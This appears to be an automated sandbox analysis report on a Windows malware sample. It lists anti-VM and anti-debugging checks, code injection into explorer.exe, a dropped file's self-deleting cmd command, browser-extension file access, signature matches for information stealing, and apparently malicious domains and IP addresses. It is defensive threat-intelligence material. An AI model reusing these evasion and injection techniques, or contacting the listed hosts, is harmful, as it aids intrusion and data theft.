Source: C:\Users\user\AppData\Local\Temp\5999.exe Process information set: NOOPENFILEERRORBOX (4 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (3 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (54 occurrences)

Malware Analysis System Evasion

Source: file.exe, 00000000.00000002.356947410.00000000008CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK#V
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 occurrences)
Source: C:\Users\user\AppData\Roaming\uucbfdt Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 occurrences)
Source: C:\Users\user\AppData\Local\Temp\405E.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 occurrences)
Source: C:\Windows\explorer.exe TID: 4112 Thread sleep count: 650 > 30
Source: C:\Windows\explorer.exe TID: 4656 Thread sleep count: 276 > 30
Source: C:\Windows\explorer.exe TID: 4584 Thread sleep count: 227 > 30
Source: C:\Windows\explorer.exe TID: 792 Thread sleep count: 576 > 30
Source: C:\Windows\explorer.exe TID: 1412 Thread sleep count: 155 > 30
Source: C:\Windows\explorer.exe TID: 1444 Thread sleep count: 122 > 30
Source: C:\Windows\explorer.exe TID: 5792 Thread sleep count: 143 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5060 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 12_2_004019F0
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 650
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 576
Source: C:\Users\user\AppData\Local\Temp\37F1.exe API coverage: 9.1 %
Source: C:\Users\user\AppData\Local\Temp\5487.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\AppData\Local\Temp\37F1.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: explorer.exe, 00000001.00000000.269533597.000000000464E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 30d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 5487.exe, 00000012.00000002.513831568.00000000009B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX7
Source: explorer.exe, 00000001.00000000.323199405.00000000084D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.317110640.000000000683A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.278833693.00000000081DD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
Source: explorer.exe, 00000001.00000000.316449381.0000000006710000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: 5487.exe, 00000012.00000002.521372912.000000001AE98000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\.
Source: 5487.exe, 00000012.00000002.514521211.0000000000A04000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.321884280.0000000008304000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000001.00000000.353037520.00000000082B2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000001.00000000.278950861.0000000008200000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&
Source: 37F1.exe, 0000000C.00000002.552906667.0000000008132000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\file.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\uucbfdt System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\405E.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 12_2_004019F0
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 12_2_004019F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070092B mov eax, dword ptr fs:[00000030h] 0_2_0070092B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00700D90 mov eax, dword ptr fs:[00000030h] 0_2_00700D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008DC7A8 push dword ptr fs:[00000030h] 0_2_008DC7A8
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D0D90 mov eax, dword ptr fs:[00000030h] 12_2_048D0D90
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D092B mov eax, dword ptr fs:[00000030h] 12_2_048D092B
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\uucbfdt Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\405E.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_0040CE09
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_0040ADB0 GetProcessHeap,HeapFree, 12_2_0040ADB0
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_0040CE09
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_0040E61C
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00416F6A
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_004123F1 SetUnhandledExceptionFilter, 12_2_004123F1
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048E2658 SetUnhandledExceptionFilter, 12_2_048E2658
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048DE883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_048DE883
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048DD070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_048DD070
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048E71D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_048E71D1

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Domain query: o36fafs3sn6xou.com
Source: C:\Windows\explorer.exe Domain query: furubujjul.net
Source: C:\Windows\explorer.exe Domain query: o3zxuhcc4hl9mi.com
Source: C:\Windows\explorer.exe Domain query: o3l3roozuidudu.com
Source: C:\Windows\explorer.exe Network Connect: 185.174.137.70 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: shingroup.com
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 193.106.191.15 80
Source: C:\Windows\SysWOW64\explorer.exe Domain query: starvestitibo.org
Source: C:\Windows\explorer.exe File created: 5999.exe.1.dr Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\uucbfdt Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\uucbfdt Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\405E.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\405E.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5999.exe Memory written: C:\Users\user\AppData\Local\Temp\5999.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread created: C:\Windows\explorer.exe EIP: 4E61ACC Jump to behavior
Source: C:\Users\user\AppData\Roaming\uucbfdt Thread created: unknown EIP: 4EC1ACC Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\405E.exe Thread created: unknown EIP: 5051A28 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: E1F380 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 5220 base: E1F380 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 3572 base: 7FF647908150 value: 90 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\Temp\5487.exe" & exit Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5999.exe Process created: C:\Users\user\AppData\Local\Temp\5999.exe C:\Users\user\AppData\Local\Temp\5999.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: explorer.exe, 00000001.00000000.267942114.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.341498193.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.312595073.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: XProgram Manager
Source: explorer.exe, 00000001.00000000.272834140.0000000005D90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.353277614.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.267942114.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.267707719.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.311720249.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.267942114.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.267942114.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.341498193.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.312595073.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\file.exe Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoW, 0_2_00412000
Source: C:\Users\user\Desktop\file.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 0_2_0041251C
Source: C:\Users\user\Desktop\file.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA, 0_2_00409B57
Source: C:\Users\user\Desktop\file.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_004183C4
Source: C:\Users\user\Desktop\file.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num, 0_2_00412B8A
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoW, 11_2_00412000
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 11_2_0041251C
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA, 11_2_00409B57
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 11_2_004183C4
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num, 11_2_00412B8A
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: GetLocaleInfoA, 12_2_00417A20
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: GetLocaleInfoA, 12_2_048E7C87
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 12_2_00412A15

Stealing of Sensitive Information

Source: Yara match File source: 12.2.37F1.exe.4a8b076.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.7290000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.7290000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4b70ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f55530.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f56418.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4a8a18e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f56418.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.37F1.exe.2eb9e80.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.48d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f8cf50.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.37F1.exe.4910000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.37F1.exe.2eb9e80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f8cf50.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4b70000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4b70ee8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.5f55530.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4a8a18e.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4b70000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.37F1.exe.4a8b076.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.549799190.0000000005F55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.417269957.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.531865007.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.545785192.0000000004B70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.544624082.0000000004A4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.550663724.0000000007290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.542826089.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.426623227.0000000002EB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 37F1.exe PID: 1760, type: MEMORYSTR
Source: Yara match File source: 00000011.00000002.469185788.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 11.3.uucbfdt.720000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.700e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.gecbfdt.700e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uucbfdt.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.gecbfdt.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.405E.exe.810e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.gecbfdt.700e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.gecbfdt.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.gecbfdt.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uucbfdt.710e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.405E.exe.820000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.405E.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.3.gecbfdt.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.gecbfdt.700e67.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.356712809.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.505978851.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.356833950.0000000000841000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.504789684.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.475515508.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.403897156.0000000000820000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.255442832.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.443176510.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.505917720.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.443497890.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
